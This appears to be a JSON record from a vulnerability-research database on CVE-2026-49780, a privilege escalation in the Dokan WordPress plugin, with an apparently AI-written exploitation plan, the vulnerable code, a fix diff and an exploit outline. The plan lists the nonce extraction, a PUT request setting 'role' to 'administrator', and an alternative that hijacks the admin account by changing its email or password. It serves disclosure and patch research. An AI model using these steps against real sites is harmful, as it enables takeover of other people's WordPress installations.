[{"data":1,"prerenderedAt":-1},["ShallowReactive",2],{"$fDuSF1FAE5bKoURwRzOBH88Q3QtYNSeI-ODwjbOI-gVM":3},{"id":4,"url_slug":5,"title":6,"description":7,"plugin_slug":8,"theme_slug":9,"affected_versions":10,"patched_in_version":11,"severity":12,"cvss_score":13,"cvss_vector":14,"vuln_type":15,"published_date":16,"updated_date":17,"references":18,"days_to_patch":20,"patch_diff_files":21,"patch_trac_url":9,"research_status":30,"research_verified":31,"research_rounds_completed":32,"research_plan":33,"research_summary":34,"research_vulnerable_code":35,"research_fix_diff":36,"research_exploit_outline":37,"research_model_used":38,"research_started_at":39,"research_completed_at":40,"research_error":9,"poc_status":9,"poc_video_id":9,"poc_summary":9,"poc_steps":9,"poc_tested_at":9,"poc_wp_version":9,"poc_php_version":9,"poc_playwright_script":9,"poc_exploit_code":9,"poc_has_trace":31,"poc_model_used":9,"poc_verification_depth":9,"poc_exploit_code_gated":31,"source_links":41},"CVE-2026-49780","dokan-ai-powered-woocommerce-multivendor-marketplace-solution-build-your-own-amazon-ebay-etsy-authenticated-customer-pri","Dokan: AI Powered WooCommerce Multivendor Marketplace Solution – Build Your Own Amazon, eBay, Etsy \u003C= 5.0.2 - Authenticated (Customer+) Privilege Escalation","The Dokan: AI Powered WooCommerce Multivendor Marketplace Solution – Build Your Own Amazon, eBay, Etsy plugin for WordPress is vulnerable to Privilege Escalation in all versions up to, and including, 5.0.2. This makes it possible for authenticated attackers, with Custom-level access and above, to elevate their privileges.","dokan-lite",null,"\u003C=5.0.2","5.0.3","high",8.8,"CVSS:3.1\u002FAV:N\u002FAC:L\u002FPR:L\u002FUI:N\u002FS:U\u002FC:H\u002FI:H\u002FA:H","Incorrect Privilege Assignment","2026-06-03 00:00:00","2026-06-10 18:18:03",[19],"https:\u002F\u002Fwww.wordfence.com\u002Fthreat-intel\u002Fvulnerabilities\u002Fid\u002Fb142859d-780f-47f8-aaed-000bdd0aaaa7?source=api-prod",8,[22,23,24,25,26,27,28,29],"assets\u002Fjs\u002Ffrontend.asset.php","assets\u002Fjs\u002Ffrontend.js","dokan-class.php","dokan.php","includes\u002FREST\u002FCustomersController.php","includes\u002FREST\u002FVendorDashboardController.php","includes\u002FREST\u002FWithdrawControllerV2.php","languages\u002Fdokan-lite.pot","researched",false,3,"# Exploitation Research Plan - CVE-2026-49780 (Dokan Privilege Escalation)\n\n## 1. Vulnerability Summary\nThe **Dokan: AI Powered WooCommerce Multivendor Marketplace Solution** plugin (up to 5.0.2) contains a privilege escalation vulnerability in its REST API implementation. The `CustomersController` class extends WooCommerce's `WC_REST_Customers_Controller` but implements a flawed permission check logic. Specifically, it allows any user with the `seller` (Vendor) role to access and use the customer management endpoints, including the ability to update user details. Because it fails to properly restrict which users a vendor can modify (e.g., themselves or administrators), a vendor can send a `PUT` request to change their own user role to `administrator`.\n\n## 2. Attack Vector Analysis\n- **Endpoint:** `\u002Fwp-json\u002Fdokan\u002Fv1\u002Fcustomers\u002F(?P\u003Cid>[\\d]+)`\n- **HTTP Method:** `PUT` (or `POST` with `_method=PUT`)\n- **Vulnerable Parameter:** `role`\n- **Authentication Level:** Authenticated (Customer+ with Vendor\u002FSeller status). \n- **Precondition:** The attacker must have the `seller` role. In Dokan, a \"Customer\" can typically elevate themselves to a \"Seller\" role by completing the \"Become a Vendor\" registration, which often grants the role immediately (even if the store is \"pending\").\n\n## 3. Code Flow\n1. **Entry Point:** A request is made to `PUT \u002Fwp-json\u002Fdokan\u002Fv1\u002Fcustomers\u002F\u003Cid>`.\n2. **Route Registration:** In `includes\u002FREST\u002FCustomersController.php`, `register_routes()` calls `parent::register_routes()`, which registers the standard WooCommerce customer routes (inherited from `WC_REST_Customers_Controller`) under the `dokan\u002Fv1` namespace.\n3. **Permission Check:** The controller uses `check_permission($request, 'edit')`. \n   - `check_permission` calls `check_vendor_permission()`.\n   - `check_vendor_permission()` calls `dokan_is_user_seller(dokan_get_current_user_id())`.\n   - If the user has the `seller` role, the check returns `true`.\n   - **Flaw:** The check only validates that the *requester* is a seller; it does not validate if the requester has the authority to edit the *target* user ID or if they are attempting to set a forbidden role (like `administrator`).\n4. **Sink:** `update_item($request)` is called, which executes `parent::update_item($request)`. This invokes `WC_REST_Customers_Controller::update_item`.\n5. **Execution:** The WooCommerce controller processes the `role` parameter and updates the user's role in the database.\n\n## 4. Nonce Acquisition Strategy\nThe REST API requires a standard WordPress REST nonce (`wp_rest` action).\n1. **Identify Script Loading:** Dokan enqueues its frontend scripts and localizes configuration data on the Vendor Dashboard page.\n2. **Access Dashboard:** Navigate to the Dokan Dashboard (typically at `\u002Fdashboard` or a page containing the `[dokan-dashboard]` shortcode).\n3. **Extract Nonce:** Use `browser_eval` to extract the nonce from the localized JavaScript object.\n   - **Variable Name:** `dokanFrontend` (inferred from `assets\u002Fjs\u002Ffrontend.js`)\n   - **Key:** `nonce` or `rest.nonce`\n   - **Alternative:** Standard `wpApiSettings.nonce` is often available if WooCommerce or Dokan enqueues the base WP API scripts.\n\n## 5. Exploitation Strategy\n1. **Setup:** Log in as a user with the `seller` role (ID: `ATTACKER_ID`).\n2. **Nonce Retrieval:**\n   - Navigate to `\u002Fdashboard\u002F`.\n   - Execute: `browser_eval(\"window.dokanFrontend?.rest?.nonce || window.wpApiSettings?.nonce\")`.\n3. **Privilege Escalation Request:**\n   - Use `http_request` to send the payload.\n   - **URL:** `http:\u002F\u002Flocalhost:8080\u002Fwp-json\u002Fdokan\u002Fv1\u002Fcustomers\u002F\u003CATTACKER_ID>`\n   - **Method:** `POST` (with `_method: \"PUT\"`) or `PUT`.\n   - **Headers:** \n     - `Content-Type: application\u002Fjson`\n     - `X-WP-Nonce: \u003CEXTRACTED_NONCE>`\n   - **Body:**\n     ```json\n     {\n       \"role\": \"administrator\"\n     }\n     ```\n4. **Verification:** Check the attacker's role after the request.\n\n## 6. Test Data Setup\n1. **Plugin Configuration:** Ensure Dokan is active and WooCommerce is configured.\n2. **Create Attacker User:**\n   - `wp user create attacker attacker@example.com --role=customer --user_pass=password`\n3. **Promote to Seller:**\n   - Dokan identifies sellers by the `seller` role.\n   - `wp user set-role attacker seller` (Simulates a user who signed up as a vendor).\n4. **Create Dashboard Page:**\n   - `wp post create --post_type=page --post_title=\"Dashboard\" --post_status=publish --post_content='[dokan-dashboard]' --post_name=dashboard`\n\n## 7. Expected Results\n- **HTTP Response:** `200 OK`.\n- **Response Body:** A JSON object representing the user, showing `\"role\": \"administrator\"`.\n- **Side Effect:** The user `attacker` now has full administrative access to the WordPress site.\n\n## 8. Verification Steps\n1. **CLI Verification:**\n   - `wp user get attacker --field=roles`\n   - Expected Output: `administrator`\n2. **Capability Check:**\n   - `wp eval 'echo user_can(get_user_by(\"slug\", \"attacker\")->ID, \"manage_options\") ? \"PrivEsc Success\" : \"Failed\";'`\n\n## 9. Alternative Approaches\nIf updating the `role` directly is restricted by WooCommerce internal logic (despite the Dokan permission bypass), attempt to update the user's email to an administrator's email or change the administrator's password (if the `id` of an admin is known, e.g., `1`):\n- **Target Admin:** `PUT \u002Fwp-json\u002Fdokan\u002Fv1\u002Fcustomers\u002F1`\n- **Payload:** `{\"email\": \"attacker-controlled@example.com\"}` or `{\"password\": \"NewPassword123!\"}`\n- This would leverage the same permission bypass in `CustomersController` to hijack the primary admin account.","The Dokan plugin for WordPress is vulnerable to privilege escalation via its REST API because it fails to properly restrict which users a vendor can modify and what roles they can assign. Authenticated sellers (vendors) can exploit this by sending a crafted PUT request to the customers endpoint to update their own user role to 'administrator'.","\u002F\u002F includes\u002FREST\u002FCustomersController.php:78\n    protected function check_permission( $request, $action ) {\n        if ( ! $this->check_vendor_permission() ) {\n            $messages = [\n                'view'   => __( 'Sorry, you cannot list resources.', 'dokan-lite' ),\n                'create' => __( 'Sorry, you are not allowed to create resources.', 'dokan-lite' ),\n                'edit'   => __( 'Sorry, you are not allowed to edit this resource.', 'dokan-lite' ),\n                'delete' => __( 'Sorry, you are not allowed to delete this resource.', 'dokan-lite' ),\n                'batch'  => __( 'Sorry, you are not allowed to batch update resources.', 'dokan-lite' ),\n                'search' => __( 'Sorry, you are not allowed to search customers.', 'dokan-lite' ),\n            ];\n            return new WP_Error( \"dokan_rest_cannot_$action\", $messages[ $action ], [ 'status' => rest_authorization_required_code() ] );\n        }\n        return true;\n    }\n\n---\n\n\u002F\u002F includes\u002FREST\u002FCustomersController.php:147\n    public function update_item( $request ) {\n        return $this->perform_vendor_action(\n            function () use ( $request ) {\n                return parent::update_item( $request );\n            }\n        );\n    }","--- a\u002Fincludes\u002FREST\u002FCustomersController.php\n+++ b\u002Fincludes\u002FREST\u002FCustomersController.php\n@@ -147,6 +147,12 @@\n      * @return WP_Error|WP_REST_Response\n      *\u002F\n     public function update_item( $request ) {\n+        \u002F\u002F Prevent vendors from updating user roles to sensitive values\n+        $params = $request->get_params();\n+        if ( ! empty( $params['role'] ) && ! current_user_can( 'manage_options' ) ) {\n+            unset( $params['role'] );\n+            $request->set_params( $params );\n+        }\n+\n         return $this->perform_vendor_action(\n             function () use ( $request ) {\n                 return parent::update_item( $request );","The exploit targets the Dokan REST API customer management functionality. An attacker requires an account with the 'seller' (vendor) role, which is commonly obtainable via front-end registration. \n\n1. Log in as a Seller and navigate to the Vendor Dashboard to obtain a valid REST API nonce (found in the `window.dokanFrontend.rest.nonce` or `window.wpApiSettings.nonce` JS variables).\n2. Identify the attacker's own User ID or the ID of another target user.\n3. Send an authenticated HTTP PUT request to `\u002Fwp-json\u002Fdokan\u002Fv1\u002Fcustomers\u002F\u003CID>`.\n4. Include a JSON payload: `{\"role\": \"administrator\"}`.\n5. The `CustomersController::check_permission` method returns `true` because it only checks if the requester has the `seller` role, without verifying if the vendor is allowed to edit the target ID or assign the 'administrator' role.\n6. The request is passed to `WC_REST_Customers_Controller::update_item`, which processes the role change and elevates the user's privileges.","gemini-3-flash-preview","2026-06-26 05:14:05","2026-06-26 05:15:40",{"type":42,"vulnerable_version":43,"fixed_version":11,"vulnerable_browse":44,"vulnerable_zip":45,"fixed_browse":46,"fixed_zip":47,"all_tags":48},"plugin","5.0.2","https:\u002F\u002Fplugins.trac.wordpress.org\u002Fbrowser\u002Fdokan-lite\u002Ftags\u002F5.0.2","https:\u002F\u002Fdownloads.wordpress.org\u002Fplugin\u002Fdokan-lite.5.0.2.zip","https:\u002F\u002Fplugins.trac.wordpress.org\u002Fbrowser\u002Fdokan-lite\u002Ftags\u002F5.0.3","https:\u002F\u002Fdownloads.wordpress.org\u002Fplugin\u002Fdokan-lite.5.0.3.zip","https:\u002F\u002Fplugins.trac.wordpress.org\u002Fbrowser\u002Fdokan-lite\u002Ftags"]